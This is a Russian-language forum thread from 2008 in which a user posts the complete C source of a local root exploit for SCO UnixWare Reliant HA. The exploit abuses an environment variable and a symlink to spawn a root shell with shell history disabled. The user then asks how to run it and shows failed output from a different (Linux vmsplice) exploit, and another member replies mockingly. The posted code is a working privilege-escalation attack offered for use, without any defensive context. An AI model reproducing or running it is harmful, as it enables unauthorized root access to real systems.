SCO UnixWare Reliant HA Local Root Exploit

Discussion in 'Безопасность и Анонимность' started by heks, 4 Apr 2008.

  1. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    привет всем вот есть такой сплоит

    * I have'nt seen any advisory on this; possibly still not fixed.
    *
    * SCO UnixWare Reliant HA Local Root Exploit
    * By qaaz
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>
    #include <fcntl.h>

    #define TGT1 "/usr/opt/reliant/bin/hvdisp"
    #define TGT2 "/usr/opt/reliant/bin/rcvm"
    #define DIR "bin"
    #define BIN DIR "/hvenv"

    int main(int argc, char *argv[])
    {
    char self[4096], *target;
    pid_t child;

    if (geteuid() == 0) {
    setuid(geteuid());
    dup2(3, 0);
    dup2(4, 1);
    dup2(5, 2);
    if ((child = fork()) == 0) {
    putenv("HISTFILE=/dev/null");
    execl("/bin/sh", "sh", "-i", NULL);
    printf("[-] sh: %s\n", strerror(errno));
    } else if (child != -1)
    waitpid(child, NULL, 0);
    kill(getppid(), 15);
    return 1;
    }

    printf("----------------------------------------\n");
    printf(" UnixWare Reliant HA Local Root Exploit\n");
    printf(" By qaaz\n");
    printf("----------------------------------------\n");

    if (access(TGT1, EX_OK) == 0)
    target = TGT1;
    else if (access(TGT2, EX_OK) == 0)
    target = TGT2;
    else {
    printf("[-] No targets found\n");
    return 1;
    }

    sprintf(self, "/proc/%d/object/a.out", getpid());

    if (mkdir(DIR, 0777) < 0 && errno != EEXIST) {
    printf("[-] %s: %s\n", DIR, strerror(errno));
    return 1;
    }

    if (symlink(self, BIN) < 0) {
    printf("[-] %s: %s\n", BIN, strerror(errno));
    rmdir(DIR);
    return 1;
    }

    if ((child = fork()) == 0) {
    char path[4096] = "RELIANT_PATH=";

    dup2(0, 3);
    dup2(1, 4);
    dup2(2, 5);
    putenv(strcat(path, getcwd(NULL, sizeof(path)-14)));
    execl(target, target, NULL);
    printf("[-] %s: %s\n", target, strerror(errno));
    return 1;
    } else if (child != -1)
    waitpid(child, NULL, 0);

    unlink(BIN);
    rmdir(DIR);
    return 0;
    }

    // milw0rm.com [2008-04-04]



    можно узнать как им пользоваться скомпилить вроде скомпилил запустил
    ./sploit

    он мне выдал
    -----------------------------------
    Linux vmsplice Local Root Exploit
    By qaaz
    -----------------------------------
    [+] mmap: 0x0 .. 0x1000
    [+] page: 0x0
    [+] page: 0x20
    [+] mmap: 0x4000 .. 0x5000
    [+] page: 0x4000
    [+] page: 0x4020
    [+] mmap: 0x1000 .. 0x2000
    [+] page: 0x1000
    [+] mmap: 0x21b000 .. 0x24d000
    [-] vmsplice: Function not implemented

    это означает что у меня ни чего не вышло?
     
    #1 heks, 4 Apr 2008
  2. MicRO

    MicRO Member

    Joined:
    28 Oct 2004
    Messages:
    274
    Likes Received:
    75
    Reputations:
    49
    конешно можно, заходим на translate.ru
    и спрашиваем:
    [-] vmsplice: Function not implemented -- Функция, не осуществленная
    телепатов тут нет Ж)
     
    #2 MicRO, 13 Apr 2008
(You must log in or sign up to post here.)